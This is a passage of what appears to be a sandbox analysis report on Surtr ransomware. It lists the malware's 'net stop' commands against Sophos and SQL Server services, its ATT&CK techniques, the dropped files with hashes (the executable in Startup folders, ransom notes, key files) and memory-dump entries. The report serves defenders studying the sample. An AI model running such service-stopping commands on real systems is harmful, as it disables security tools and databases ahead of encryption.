C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Client"2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SBSMONITORING"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"1⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$PROFXENGAGEMENT"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SQL_2008"1⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SQL_2008"1⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$TPSAMA"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$TPSAMA"2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$TPS"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher"1⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher"1⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SHAREPOINT"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Registry Run Keys / Startup Folder
1Scheduled Task
1Hidden Files and Directories
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
1Modify Registry
4Indicator Removal on Host
1File Deletion
2Hidden Files and Directories
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.htaFilesize
8KB
MD5c3df410a4e482aedc4f65be42d97daff
SHA18602bbe25e87df92110732ccadda2d96eb82f4cf
SHA25618452592999fa1fce6ae4e5e42e2254aeff29cbb2c0f285cbe48d230e062d07a
SHA512614771207b88ece3431780b9944a36c7c6da98f26f1d863c3af9acf33a7d2532897e3c9b6d161a3d0d9fff8236e05cf16368f5ce5cdbc0f6a5f7536332f9b725
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txtFilesize
621B
MD54c97b7389e84da2773ccb3443c234ae1
SHA17c66be6a0632a44ac2017e6e1bbd8f29809b61e2
SHA2562d1c1b158ad44efd8f6c0db23fa516fd2ac7879f42382446ea714f670aa81058
SHA512c7b41236f424452fb1a794fb3a372d6bcdc17e8d279ae3fd763f70e3d12261f768b1e69a6e30d70c3027ba730d21705ee63836f23d62616bf564c9a6069d7620
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exeFilesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
C:\ProgramData\Service\ID_DATA.surtFilesize
14B
MD5a400ab7041049318608e1a9271e99d16
SHA18898c1fc86590b8f2ec053a525e9f823b89c9c31
SHA25660765c25fc2143cfffe60c358acd3d0ccb3cebb58c6a01028831ecc43d4bae64
SHA51295753c9493e311773235b5c78a8d695e26db7d3e677883849bc8790e0d76941602a456f9185af60ad0251d2e76edfa5f214cdc3bacd4a07a2b402f36ac526f76
-
C:\ProgramData\Service\Private_DATA.surtFilesize
1KB
MD5a6d8b309d8fc19204b5bacccd10a3b23
SHA11fd075ce4724b9ef845da309bd34446ebea07670
SHA2564fe478591626ae4b6722f50750be386acf31aae25f3afaa114d149958580753c
SHA512ca171656b9fd053f690801a1d455da7eab0a24596e7678d95cf56b0085cdc050d6e0948aa5089ac593cda161150649e33a16a2367230cca6ba2590e4a30cd85d
-
C:\ProgramData\Service\Public_DATA.surtFilesize
204B
MD5d501698a84bcbbeeda66a16073474c28
SHA1a6da3c4b1cfeae541ed33cb0186309a25a6e1faf
SHA256cbc140aa79c5a1a92a40be7292312536d2f705fcb56ee4417231485f475b161e
SHA512a60f77cbeb221a938ea72c8fa5e702d4ae0c275845cd81a752a0e98e8772eecd95bc46b136a506fbd47a1bceebe502805d4ac08d26fa231ad3180dd4ad4a3ad7
-
C:\ProgramData\Service\SURTR_README.htaFilesize
8KB
MD5c3df410a4e482aedc4f65be42d97daff
SHA18602bbe25e87df92110732ccadda2d96eb82f4cf
SHA25618452592999fa1fce6ae4e5e42e2254aeff29cbb2c0f285cbe48d230e062d07a
SHA512614771207b88ece3431780b9944a36c7c6da98f26f1d863c3af9acf33a7d2532897e3c9b6d161a3d0d9fff8236e05cf16368f5ce5cdbc0f6a5f7536332f9b725
-
C:\ProgramData\Service\SURTR_README.txtFilesize
621B
MD54c97b7389e84da2773ccb3443c234ae1
SHA17c66be6a0632a44ac2017e6e1bbd8f29809b61e2
SHA2562d1c1b158ad44efd8f6c0db23fa516fd2ac7879f42382446ea714f670aa81058
SHA512c7b41236f424452fb1a794fb3a372d6bcdc17e8d279ae3fd763f70e3d12261f768b1e69a6e30d70c3027ba730d21705ee63836f23d62616bf564c9a6069d7620
-
C:\ProgramData\Service\Surtr.exeFilesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
C:\ProgramData\Service\SurtrBackGround.jpgFilesize
30KB
MD533f7fc301be9d39fcb474fb8b1e5f42e
SHA1a3bf9ddb2ac53bc4b12b249825189a7c7a07b766
SHA25699cd579177b2480dab17d125bcabe16f503b467208c2568c5564d13ffb457d03
SHA5126cf0f2a65cc9d001087b8a685f1199ece6cd6e25f91b421a5a176ed8a1578e9b5da5fd4cd1708fc3639c30f1724e238ad6d4a2b09d45b53737468b31ddf50d00
-
C:\ProgramData\Service\SurtrIcon.icoFilesize
78KB
MD53257eb22824b57fe3d58074bca3128d3
SHA16f60ff4e7419ccdbc3d0dedc8474a0722d7d0a97
SHA2565afba257ff405ceb733b2b6f270a16c8e0fffe92e6c91c6554a2ea4706e8c3ad
SHA5127b41c8714aa64bd5a3a9e782a5bda8875882182863c9dd11273c168ef2b064f2c31c6c0e9d30f9db7ff99dae0542773f9a8ef995830c427d167120711ab4878d
-
C:\Users\Admin\AppData\Local\Temp\Service\ID_DATA.surtFilesize
14B
MD5a400ab7041049318608e1a9271e99d16
SHA18898c1fc86590b8f2ec053a525e9f823b89c9c31
SHA25660765c25fc2143cfffe60c358acd3d0ccb3cebb58c6a01028831ecc43d4bae64
SHA51295753c9493e311773235b5c78a8d695e26db7d3e677883849bc8790e0d76941602a456f9185af60ad0251d2e76edfa5f214cdc3bacd4a07a2b402f36ac526f76
-
C:\Users\Admin\AppData\Local\Temp\Service\Private_DATA.surtFilesize
1KB
MD5a6d8b309d8fc19204b5bacccd10a3b23
SHA11fd075ce4724b9ef845da309bd34446ebea07670
SHA2564fe478591626ae4b6722f50750be386acf31aae25f3afaa114d149958580753c
SHA512ca171656b9fd053f690801a1d455da7eab0a24596e7678d95cf56b0085cdc050d6e0948aa5089ac593cda161150649e33a16a2367230cca6ba2590e4a30cd85d
-
C:\Users\Admin\AppData\Local\Temp\Service\SURTR_README.htaFilesize
8KB
MD5c3df410a4e482aedc4f65be42d97daff
SHA18602bbe25e87df92110732ccadda2d96eb82f4cf
SHA25618452592999fa1fce6ae4e5e42e2254aeff29cbb2c0f285cbe48d230e062d07a
SHA512614771207b88ece3431780b9944a36c7c6da98f26f1d863c3af9acf33a7d2532897e3c9b6d161a3d0d9fff8236e05cf16368f5ce5cdbc0f6a5f7536332f9b725
-
C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exeFilesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exeFilesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
memory/108-111-0x0000000000000000-mapping.dmp
-
memory/360-65-0x0000000000000000-mapping.dmp
-
memory/416-71-0x0000000000000000-mapping.dmp
-
memory/468-63-0x0000000000000000-mapping.dmp
-
memory/524-64-0x0000000000000000-mapping.dmp
-
memory/532-102-0x0000000000000000-mapping.dmp
-
memory/544-89-0x0000000000000000-mapping.dmp
-
memory/556-104-0x0000000000000000-mapping.dmp
-
memory/592-82-0x0000000000000000-mapping.dmp
-
memory/736-66-0x0000000000000000-mapping.dmp
-
memory/760-99-0x0000000000000000-mapping.dmp
-
memory/776-98-0x0000000000000000-mapping.dmp
-
memory/792-107-0x0000000000000000-mapping.dmp
-
memory/812-86-0x0000000000000000-mapping.dmp
-
memory/816-103-0x0000000000000000-mapping.dmp
-
memory/868-110-0x0000000000000000-mapping.dmp
-
memory/956-56-0x0000000140000000-0x0000000140136000-memory.dmpFilesize
1.2MB
-
memory/956-61-0x0000000140000000-0x0000000140136000-memory.dmpFilesize
1.2MB
-
memory/956-59-0x0000000140000000-0x0000000140136000-memory.dmpFilesize
1.2MB
-
memory/956-58-0x0000000140000000-0x0000000140136000-memory.dmpFilesize
1.2MB
-
memory/956-62-0x0000000140000000-0x0000000140136000-memory.dmpFilesize
1.2MB
-
memory/956-55-0x0000000140000000-0x0000000140136000-memory.dmpFilesize
1.2MB
-
memory/956-60-0x0000000140133F50-mapping.dmp
-
memory/992-80-0x0000000000000000-mapping.dmp
-
memory/1012-101-0x0000000000000000-mapping.dmp
-
memory/1056-106-0x0000000000000000-mapping.dmp
-
memory/1200-78-0x0000000000000000-mapping.dmp
-
memory/1228-67-0x0000000000000000-mapping.dmp
-
memory/1356-69-0x0000000000000000-mapping.dmp
-
memory/1388-93-0x0000000000000000-mapping.dmp
-
memory/1408-88-0x0000000000000000-mapping.dmp
-
memory/1448-97-0x0000000000000000-mapping.dmp
-
memory/1460-105-0x0000000000000000-mapping.dmp
-
memory/1468-73-0x0000000000000000-mapping.dmp
-
memory/1476-75-0x0000000000000000-mapping.dmp
-
memory/1480-115-0x0000000000000000-mapping.dmp
-
memory/1484-74-0x0000000000000000-mapping.dmp
-
memory/1500-77-0x0000000000000000-mapping.dmp
-
memory/1532-94-0x0000000000000000-mapping.dmp
-
memory/1552-92-0x0000000000000000-mapping.dmp
-
memory/1580-96-0x0000000000000000-mapping.dmp
-
memory/1608-95-0x0000000000000000-mapping.dmp
-
memory/1636-87-0x0000000000000000-mapping.dmp
-
memory/1640-72-0x0000000000000000-mapping.dmp
-
memory/1676-117-0x0000000000000000-mapping.dmp
-
memory/1716-91-0x0000000000000000-mapping.dmp
-
memory/1728-83-0x0000000000000000-mapping.dmp
-
memory/1736-81-0x0000000000000000-mapping.dmp
-
memory/1752-108-0x0000000000000000-mapping.dmp
-
memory/1756-84-0x0000000000000000-mapping.dmp
-
memory/1772-100-0x0000000000000000-mapping.dmp
-
memory/1784-68-0x0000000000000000-mapping.dmp
-
memory/1812-70-0x0000000000000000-mapping.dmp
-
memory/1824-79-0x0000000000000000-mapping.dmp
-
memory/1860-76-0x0000000000000000-mapping.dmp
-
memory/1888-90-0x0000000000000000-mapping.dmp
-
memory/1900-109-0x0000000000000000-mapping.dmp
-
memory/1912-113-0x0000000000000000-mapping.dmp
-
memory/1944-85-0x0000000000000000-mapping.dmp
-
memory/1988-112-0x0000000000000000-mapping.dmp
-
memory/2036-114-0x0000000000000000-mapping.dmp
-
memory/2052-118-0x0000000000000000-mapping.dmp
-
memory/2060-116-0x0000000000000000-mapping.dmp
-
memory/2212-120-0x0000000000000000-mapping.dmp
-
memory/2220-119-0x0000000000000000-mapping.dmp
-
memory/2228-121-0x0000000000000000-mapping.dmp
-
memory/2236-123-0x0000000000000000-mapping.dmp
-
memory/2248-125-0x0000000000000000-mapping.dmp
-
memory/2256-124-0x0000000000000000-mapping.dmp
-
memory/2264-122-0x0000000000000000-mapping.dmp
-
memory/4092-137-0x000007FEFC241000-0x000007FEFC243000-memory.dmpFilesize
8KB